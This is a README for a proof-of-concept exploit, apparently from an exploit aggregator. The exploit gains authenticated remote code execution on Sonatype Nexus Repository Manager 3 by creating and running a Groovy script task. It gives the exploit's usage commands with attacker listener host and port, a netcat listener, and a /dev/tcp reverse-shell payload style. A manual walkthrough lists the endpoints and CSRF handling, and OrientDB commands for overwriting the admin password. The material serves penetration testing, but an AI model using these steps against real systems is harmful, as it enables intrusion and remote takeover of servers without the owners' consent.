Share
## https://sploitus.com/exploit?id=1A464B35-3EBD-51E4-85E1-58A8AE9965D3
# Nexus Repository Manager 3 Authenticated RCE (Groovy Script Task)

This repository contains `exploit.py`, a proof-of-concept exploit that performs **authenticated remote code execution** on Sonatype Nexus Repository Manager 3 by creating and running a **Groovy "script" task** as an authenticated admin user.

## Key points

- **Exploit type**: Authenticated RCE (requires valid admin creds)
- **Technique**: Create a scheduled task of type `script` (Groovy) and run it to execute an OS command / reverse shell
- **Default payload mode**: **Windows** (`cmd.exe` via `ProcessBuilder`)
- **Linux mode**: Supported in code via `--linux`, but **NOT TESTED** (see "Linux note")

## Tested environment

- **Product**: Sonatype Nexus Repository Manager `3.41.1-01`
- **Target OS**: Windows

## Setting up Nexus (lab)

These steps describe how to stand up **Nexus 3.41.1-01 on Windows** for a local lab, then set the admin password to `admin123` (the value used in the examples above).

### 1) Download the repository

- Clone this repository.

### 2) Start Nexus

From the extracted directory, run Nexus in the foreground:

```bash
.\nexus-3.41.1-01\bin\nexus.exe /run
```

Wait until the service finishes starting, then browse to:

- `http://:8081/`

### 3) Change the admin password

From the Nexus OrientDB console, run the following commands:

```powershell
connect plocal:F:/nexus/sonatype-work/nexus3/db/security admin admin
update user SET password="$shiro1$SHA-512$1024$NE+wqQq/TmjZMvfI7ENh/g==$V4yPw8T64UQ6GfJfxYq2hLsVrBY8D1v+bktfOxGdt4b/9BthpWPNUy/CBk6V9iA0nHpzYzJFWO8v/tZFtES8CA==" UPSERT WHERE id="admin"
update user set status="active" upsert where id="admin"
update user_role_mapping set roles=["nx-admin"] where userId="admin"
select status from user where id="admin"
select roles from user_role_mapping where userId="admin"
exit
```

Then run this PowerShell snippet to execute the commands using Nexus's OrientDB console jar:

```powershell
$commands = @'
connect plocal:F:/nexus/sonatype-work/nexus3/db/security admin admin
update user SET password="$shiro1$SHA-512$1024$NE+wqQq/TmjZMvfI7ENh/g==$V4yPw8T64UQ6GfJfxYq2hLsVrBY8D1v+bktfOxGdt4b/9BthpWPNUy/CBk6V9iA0nHpzYzJFWO8v/tZFtES8CA==" UPSERT WHERE id="admin"
update user set status="active" upsert where id="admin"
update user_role_mapping set roles=["nx-admin"] where userId="admin"
select status from user where id="admin"
select roles from user_role_mapping where userId="admin"
exit
'@
$commands | & "F:\nexus\nexus-3.41.1-01\jre\bin\java.exe" -jar "F:\nexus\nexus-3.41.1-01\lib\support\nexus-orient-console.jar"
```


## Requirements

- Python 3.9+ recommended
- Python dependency: `requests`
- Network access to the Nexus web interface
- A listener ready for reverse shell (e.g. `nc -lvnp `)

## What the script does (high level)

1. **Authenticates** to Nexus via the UI session endpoint and receives an authenticated session cookie.
2. **Creates a task** (type `script`) using the ExtDirect API and stores a Groovy payload in the task definition.
3. **Runs the task** via the REST API endpoint for task execution.
4. The Groovy payload establishes a reverse shell to your listener.

## Usage

### Windows target (default)

Windows is the default mode. You can optionally pass `--windows` for clarity.

```bash
python exploit.py -t http://nexus.local:8081 -u admin -p admin123 -lh 10.10.14.15 -lp 9001
```

If the run is accepted, Nexus may return **HTTP 204** (No Content). The script treats **200/204** as "executed/queued".

### Linux target (NOT TESTED)

The script supports a Linux Groovy payload generator via `--linux`, but **this has not been tested on a Linux target**.

```bash
python exploit.py -t http://nexus.local:8081 -u admin -p admin123 -lh 10.10.14.15 -lp 9001 --linux
```

## Payload behavior

### Windows (default)

- Uses Groovy + Java `ProcessBuilder(cmd).redirectErrorStream(true).start()`
- `--command` controls which program is executed (default: `cmd.exe`)

### Linux (`--linux`) โ€” NOT TESTED

- Uses Groovy + Java `Runtime.getRuntime().exec(["/bin/bash","-c", "..."] as String[])`
- Uses a `/dev/tcp//` reverse shell style command
- Note: this assumes `/bin/bash` exists and `/dev/tcp` is supported by the shell

## Manual exploitation steps (no script)

Below is a "manual" walkthrough of what `exploit.py` automates. Exact headers/cookies matter; capture your own traffic and mirror the UI behavior for best results.

### 1) Start a listener

- On your machine, start a TCP listener on your chosen port.

### 2) Authenticate and obtain a session cookie

- **Endpoint**: `POST /service/rapture/session`
- **Goal**: Obtain `NXSESSIONID` cookie (authenticated session)
- **CSRF**: The UI uses `NX-ANTI-CSRF-TOKEN` header + cookie. The value behaves like a random token; the script uses a random float string.

At a minimum, you need:

- `NX-ANTI-CSRF-TOKEN` cookie
- `NX-ANTI-CSRF-TOKEN` header
- Credentials sent as Base64-encoded values in form data (`username`, `password`)

Success typically returns:

- **HTTP 204** and a response cookie: `NXSESSIONID=`

### 3) Create a Groovy "script" task

- **Endpoint**: `POST /service/extdirect`
- **Action**: `coreui_Task`
- **Method**: `create`
- **Task type**: `script`
- **Task schedule**: `manual`
- **Properties**: provide Groovy source under:
  - `properties.language = "groovy"`
  - `properties.source = ""`

On success, the ExtDirect JSON response includes a `data.id` field, which is the **task ID**.

### 4) Run the created task

- **Endpoint**: `POST /service/rest/v1/tasks//run`

Success may return:

- **HTTP 200**, or
- **HTTP 204 No Content** (accepted/queued with no body)

### 5) Catch the reverse shell

- If the payload executes successfully, you should receive a connection on your listener at:
  - `LHOST:LPORT`

## Notes / limitations

- **Authenticated**: This exploit requires admin credentials (or a privileged account that can create/run tasks).
- **Linux mode is not tested**: The script includes a Linux payload option, but it has **not been tested on Linux targets**.
- **No cleanup**: The script does not delete the created task. If you want cleanup, delete the task in the Nexus UI/API after use.

## Legal / ethics

Use only on systems you own or have explicit permission to test.